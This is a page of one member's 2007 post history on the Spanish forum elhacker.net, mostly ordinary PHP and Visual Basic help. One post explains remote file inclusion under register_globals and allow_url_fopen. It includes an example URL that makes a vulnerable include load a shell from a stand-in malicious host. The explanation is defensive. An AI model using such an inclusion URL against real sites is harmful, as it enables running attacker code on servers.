elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25 26 27 28 29
221  Programación / PHP / Re: seguridad en php en: 23 Enero 2007, 02:23 am
Primero lo de register_globals Se tiene que tener deshabilitado  para que obliguen al programador a manejar las variables que lleguen por el metodo POST o GET de la sgte forma
Código:
$_POST['variable']

$_GET['variable']

si el programador manejase una variable llamada "variable" en su sitio y la
usara para realizar un include algo asi
Código:
include($variable);
si register_globals estuviese habilitado tu podrias acceder a la pagina de esta manera http://www.pagina.com?variable=http://www.webmaliciosa.com/shell.php
y el include se haria del archivo shell.php
 mejor dicho incluirias codigo malicioa en tu pagina
pero si register_globals estuviese en off esto no funcionaria por que deberia haber un include de la forma 

Código:
include($_GET['variable']);
y eso es muy poco visto ;)
ahora mira allow_url_fopen
deshabilita las url remotas en funciones como fopen , file_get_contents, etc
por ejemplo tu no podrias hacer esto
Código:
fopen("http.//www.webmaliciosa.com/shell.php","r")
file_get_contents("http.//www.webmaliciosa.com/shell.php")

Espero haberte ayudado aunque sea un poco
Saludos.


222  Foros Generales / Sugerencias y dudas sobre el Foro / Re: subforo de HTML en: 22 Enero 2007, 18:06 pm
o.O?
no veo la necesidad cualquier duda de html puede ser resulta en el foro de dudas webmaster
Saludos.
223  Programación / PHP / Re: paginacion en web modular!! en: 20 Enero 2007, 20:31 pm
xDººº
asi que tu eras el que me hizo perder parte del almuerzo con ese problemita :P
je weno al menos ia esta resuelto :D
224  Programación / PHP / Re: Problemas con fwrite() en: 16 Enero 2007, 15:44 pm
   
Código:
$galeria = fopen($nombre.".php", "w+");
fwrite($htmlfinal, $galeria);
fclose($galeria);
mm.... bueno parece que estas enviandole mal los parametros a la funcion fwrite xDººººº
Código:
$galeria = fopen($nombre.".php", "w+");
fwrite($galeria,$htmlfinal);
fclose($galeria);
el priemr parametro de fwrite es el manejador del archivo
Saludos.


PD
http://www.php.net/manual/es/function.fwrite.php
225  Programación / Programación Visual Basic / Re: Ayuda con mi proyecto pliss !!!!!! en: 11 Enero 2007, 03:35 am

 un exe en visual basic requiere de muchisimassss dll para su ejecucion :D
es ilogico pensar que si crea un exe en visual basic y va y lo ejecuta de buenas a primeras en cualquier pc este funcionara por que por muy compilado que digan que es el visual basic enlaza a muchas librerias , y sin ellas ese programa no se ejecutara asi de sencillo .
Ahora :P la mayoria de windows (casualidades no??) traen algunas dll y uno que otro ocx  asi que seria como dijeron arriba cuestion que "pruebes"
226  Programación / Programación Visual Basic / Re: Ayuda con mi proyecto pliss !!!!!! en: 10 Enero 2007, 22:12 pm
xDºº si asi es el visual basic nada portable  :-X
empaqueta tu proyecto y ponlo en un instalador :)  (busca en el amigo google como) cosa que  empaqueta las dll  necesarias para que funcione tu aplicativo
 :D
Saludos.
227  Programación / PHP / Re: problema con header() en: 10 Enero 2007, 21:38 pm
no se trata de eso se trata de que ya enviaste una cabecera al browser despues de eso ya no puedes enviar mas headers por que te lanza un error , primero ejecuta el php y despues recien envia al navegador las etiquetas html
Saludos.

Código:
<?php
          switch( $_GET["modulo"] )
                    {
                    case 'opcion'
                              //hace algo y luego
                              header( "Location: TEST.PHP" );
                              break;
                    default:
                              //formulario
                              break;
                    }
?>
<html>
          <head>
          <title>HOLA</title>
          </head>

          <body>
                <!--FORMULARIO-->
          </body>
</html>
228  Programación / PHP / Re: Email con php (NO DESEADO) en: 10 Enero 2007, 18:31 pm
Eso no es problema de la funcion mail del php  :rolleyes: depende de los filtros de la cuenta de correo y de como este catalogado el servidor (o como lo tengan catalogado los demas servidores :P si te consideran spam ya fuiste :D  :P ) al que pasa los correos la funcion mail , la funcion mail en si no envia los correos lo que hace es pasarlos a un servidor (configurado en el phpini ) y ya el se encarga de enviar los correos .
Si quieres algo mejorcito en las chinchetas encontraras la clase phpmailer muy buena :D .
Saludos.
229  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Mi Propuesta para el Foro: "Proyecto HCH" (algo q a todos les podria interes en: 10 Enero 2007, 03:22 am
wenas, a mi me parece bien lo de un canal irc k abra a una determinada hora para tratar de un tema determinado k alguien desee explicar

saludos
A mi esa idea me parece genial , ayudaria a que las personas del foro amplien sus conocimientos y puedan realizar sus consultas en el momento  y cualquier duda  podria ser tratada en un post en el foro durante la semana .
Sobre un canal diario kreo que eso si daria continuos problemas , se puede empezar bien pero siempre va a haber alguien que kiere ser operador y todas esas cosas , especialmente los llamados abusos (eh estado largos tiempos en el mirc y eh salido detestandolo :D ) pero esa idea de una especie de clase semanal online seria genial :) .
 Es mi humilde opinion .
Saludos.

Quisiera saber si el Chat (si es que se dá) se abrirá como popup, o como capa emergente, como subforo...  etc !
PD.
Si hay que programar algo en php puedo ayudar =) creo que me defiendo bastante bien en ello . Solo que alguien me lo pida :)
230  Programación / PHP / Re: XML + PHP en: 9 Enero 2007, 23:41 pm
Bueno ahorita toy en otra pero este te puede servir para parsear un xml
Código:
<?php

Class XmlParse
{

var $parser;
var $fileXml;
var $Element;
var $miArray;
var $arrayCont;
var $flag;
var $i;

function XmlParse($file)
{
    $this->fileXml = $file;
    $this->parser = xml_parser_create();
$this->Init();
}

function Init()
{
    xml_set_object($this->parser, $this);
    xml_set_element_handler($this->parser, 'handlerInicial', 'handlerFinal');
    xml_set_character_data_handler($this->parser, 'handlerDatos');
$this->miArray = array();
$this->arrayCont = array();
$this->flag = true;
}
function handlerInicial($parser, $nombre, $atributos)
{
if ($this->flag == true )
{
if (!array_key_exists($nombre,$this->miArray))
{
$this->miArray[$nombre] = array();
$this->arrayCont[$nombre] = 0;
}
}else{
$this->flag = true;
}
$this->Element = $nombre;
}
function handlerFinal($parser, $nombre)
{
$this->flag = false;
$this->arrayCont[$nombre]++;
}
function handlerDatos($parser, $dato)
{
if ($this->arrayCont[$this->Element] == "")
{
$this->arrayCont[$this->Element] = 0;
}
       $this->miArray[$this->Element][$this->arrayCont[$this->Element]] = $dato;
}
function miParser()
{
    if (!($fich = fopen($this->fileXml, 'r')))
{
        die('No pude abrir el fichero XML: '.$this->fileXml);
        return false;
    }
while ($data = fread($fich, 512))
{
   $resultado = xml_parse($this->parser, $data, feof($fich));
           if (!$resultado)
   {
               die(sprintf("Error de XML: %s en la linea %d",xml_error_string(xml_get_error_code($this->parser)),xml_get_current_line_number($this->parser) ) );
               xml_parser_free($this->parser);
           }
}
return $this->miArray;
}
}
?>

PD. ta un poco cutre la clase pero toy en otra sorry :D
solo sirve para parsear el xml te devolvera el contenido en un array ya tu ve si la puedes mejorar
Saludos.


Código:
<?php
include("ClsXmlParse.php");

$var = new XmlParse("sitemap.xml");
print_r($var->miParser());
?>
por si te gusta las cosas completas xDºº se usa asi
Saludos .
RePD.
Esto No deberia ir en el foro de PHP??? para eso se creo no??
Páginas: 1 ... 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25 26 27 28 29
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines